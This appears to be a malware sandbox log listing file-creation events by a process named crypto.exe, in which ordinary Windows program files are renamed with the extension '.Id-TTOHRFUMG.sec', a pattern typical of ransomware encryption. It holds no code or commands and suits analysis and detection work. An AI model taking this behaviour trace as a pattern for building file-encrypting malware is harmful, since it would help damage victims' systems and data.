File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-modules-profiler-heapwalker_zh_CN.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\Antarctica\Rothera.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO00345_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\CAGCAT10\J0195812.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\MSPUB.DEV.HXS.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Srednekolymsk.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Bibliography\Style\GostName.XSL.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\INFOPATH.EXE.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Mozilla Firefox\firefox.exe.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\audio_filter\libstereo_widen_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\CPU.Gadget\images\back.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.help.base_4.0.200.v20141007-2301.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0217872.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\3.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0185786.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\codec\libvpx_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Google\Update\1.3.35.452\goopdateres_sv.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows NT\TableTextService\TableTextServiceArray.txt.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\PPINTL.DLL.IDX_DLL.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\OFFICE14\AUTOSHAP\BD18205_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\MSQRY32.EXE.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\OLKIRMV.XML.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Media Player\Network Sharing\wmpnss_bw48.bmp.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Atlantic\Faroe.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\SlideShow.Gadget\images\pause_rest.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\ext\access-bridge-64.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA02126_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\OutlookAutoDiscover\PRODIGY.NET.XML.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\video_output\libwgl_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\form_responses.gif.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.operations_2.4.0.v20131119-0908.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.launcher.win32.win32.x86_64_1.1.200.v20141007-2033\eclipse_1655.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\IPDESIGN.DLL.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PUBWIZ\ENV98SP.POC.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\db\lib\derbyLocale_fr.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\update_tracking\org-netbeans-lib-profiler-ui.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\CONVERT\RM.DLL.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\demux\libvoc_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\GMT-4.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\WB01740_.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Library\Analysis\PROCDB.XLAM.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\Currency.Gadget\images\add_over.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroSign.prc.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\SlideShow.Gadget\images\reveal_hov.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\America\Guyana.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\GreenTea.css.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\lua\sd\jamendo.luac.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\images\settings_divider.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_black_hail.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD15058_.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\EXPTOOWS.XLA.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\Welcome.html.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\Rectangles\NavigationRight_SelectionSubpicture.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0216600.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD14656_.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\PUBSPAPR\PDIR13F.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\Sts2.css.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormToolImages.jpg.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_black_moon-waning-gibbous_partly-cloudy.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes.nl_ja_4.4.0.v20140623020002.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0151063.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\RTF_BOLD.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\Currency.Gadget\en-US\js\currency.js.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_black_windy.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\FD00775_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PAGESIZE\PGLBL026.XML.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Journal\Templates\Shorthand.jtp.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_gray_hail.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO02045_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0188679.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\WB01246_.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\Etc\GMT-5.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\rtstreamsource.ax.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0153516.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\TR00482_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\CDLMSO.DLL.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\BabyGirl\btn-previous-static.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\144DPI\(144DPI)alertIcon.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\images\novelty_settings.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.ssl.feature_1.0.0.v20140827-1444\epl-v10.html.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\FLAP.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0212751.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\Asia\Kathmandu.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0105386.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0278702.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Bibliography\Style\ISO690Nmerical.XSL.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveProjectToolset\MeetingIconMask.bmp.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolIcons\OutDomain.ico.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\MSOCFU.DLL.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\ONBttnWD.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-actions_zh_CN.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Templates\1033\Access\Sales Pipeline.accdt.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Templates\1033\Access\Marketing Projects.accdt.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PARNT_02.MID.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\7-Zip\Lang\fy.txt.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0324704.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PE03731_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolBMPs\SketchIconImages.bmp.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\RSSFeeds.Gadget\en-US\gadget.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.workbench3.nl_zh_4.4.0.v20140623020002.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0232803.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\J0115841.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\audio_output\libwasapi_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\Full\15x15dot.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\bin\jsoundds.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PAGESIZE\PGMN001.XML.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\images\settings_left_rest.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_gray_thunderstorm.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\db\bin\setEmbeddedCP.bat.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\video_filter\libgrain_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\images\settings_right_disabled.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\SPACER.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\video_filter\libpostproc_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Templates\1033\SalesReport.xltx.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107350.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\InfoPathOM\InfoPathOMFormServices\InfoPathOMFormServicesV12\Microsoft.Office.Infopath.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\Locales\zh-TW.pak.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\settings_divider_left.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AN00914_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1258.TXT.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\lua\playlist\bbc_co_uk.luac.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AN01545_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\ACCDDSF.DLL.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsViewAttachmentIcons.jpg.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_black_moon-full.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\libGLESv2.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.rcp_4.4.0.v20141007-2301\epl-v10.html.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\Asia\Dhaka.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA01141_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\MSCOL11.INF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\demux\libplaylist_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-core-execution_ja.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\IPIRM.XML.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\SlideShow.Gadget\images\pause_rest.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\SystemV\YST9.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\management\jmxremote.access.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\FORMS\1033\RESENDL.ICO.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolBMPs\Shared24x24Images.jpg.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\AddToViewArrowMask.bmp.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\db\lib\derbyLocale_it.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\ModuleAutoDeps\org-netbeans-modules-queries.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA02426_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH02829J.JPG.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\Locales\vi.pak.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\db\bin\sysinfo.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA00808_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO00170_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\PUBSPAPR\PDIR47B.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Library\SOLVER\SOLVER.XLAM.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\CPU.Gadget\images\back.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Javascripts\JSByteCodeWin.bin.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\OldAge\NavigationUp_SelectionSubpicture.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-modules-javahelp.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD21503_.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\RPLBRF35.CHM.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Media Player\wmpconfig.exe.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-autoupdate-ui_zh_CN.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\Desert\HEADER.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\TURKISH.TXT.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\Australia\Broken_Hill.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Amsterdam.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\FD00361_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FieldTypePreview\BUTTON.JPG.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\security\javaws.policy.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-core-windows_ja.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\Asia\Colombo.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0105328.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FieldTypePreview\LISTBOX.JPG.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Defender\en-US\MpAsDesc.dll.mui.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\RSSFeeds.Gadget\en-US\css\flyout.css.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\Sports\SportsMainToNotesBackground_PAL.wmv.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107090.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382969.JPG.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FORM.ICO.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PUBBA\MSPUB6.BDR.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\access\libvcd_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\codec\libx265_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\FlipPage\NavigationUp_SelectionSubpicture.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\Currency.Gadget\en-US\currency.html.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.commands_5.5.0.165303.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\Antarctica\Casey.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA01848_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\Publisher\Backgrounds\J0143750.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\Sounds\People\THROAT.WAV.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\Oasis\TAB_OFF.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\locale\id\LC_MESSAGES\vlc.mo.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\Interface.zip.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\fonts\LucidaSansDemiBold.ttf.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\HH01058_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA02091_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Media Player\Media Renderer\avtransport.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-io_ja.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\EET.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\e4_classic_win7.css.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PE03668_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\OutlookAutoDiscover\FLASH.NET.XML.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\7-Zip\Lang\lij.txt.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0086420.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0151047.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\CLASSIC1.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Midway.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\Europe\Oslo.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0282932.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\demux\libavi_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\bin\net.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\CAGCAT10\J0297185.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\config\Modules\org-netbeans-modules-profiler-selector-api.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\icons\send-email-16.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BS00184_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA00487_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\rtf_spellcheck.gif.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\BrightOrange\background.gif.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Mozilla Firefox\browser\VisualElements\VisualElements_70.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\ext\jaccess.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-util-enumerations_zh_CN.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\Pacific\Noumea.Id-TTOHRFUMG.sec	crypto.exe
